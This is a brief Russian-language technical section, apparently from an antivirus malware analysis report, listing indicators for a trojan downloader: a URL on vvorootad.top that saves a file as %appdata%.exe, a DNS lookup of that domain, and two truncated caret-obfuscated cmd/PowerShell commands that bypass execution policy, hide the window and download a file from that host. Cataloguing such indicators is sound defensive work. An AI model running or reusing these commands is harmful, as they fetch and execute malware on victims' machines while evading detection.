Техническая информация
- http://vvorootad.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^O^wERSh^E^LL.Ex^e^ -E^X^E^cU^TIonpo^Lic^y^ ^ByPAS^S ^-nOP^Ro^fIl^E -W^INdowstyLE H^I^D^d^EN^ ^(^Ne^w-O^b^J^eC^T S^y^s^TEM.N^e^t.web^CLIe^N^t).^D^O^wN^L^oa^df^Ile^(^'http://vvo...
- DNS ASK vv###otad.top
- '<SYSTEM32>\cmd.exe' /c "p^O^wERSh^E^LL.Ex^e^ -E^X^E^cU^TIonpo^Lic^y^ ^ByPAS^S ^-nOP^Ro^fIl^E -W^INdowstyLE H^I^D^d^EN^ ^(^Ne^w-O^b^J^eC^T S^y^s^TEM.N^e^t.web^CLIe^N^t).^D^O^wN^L^oa^df^Ile^(^'http://vvo...' (со скрытым окном)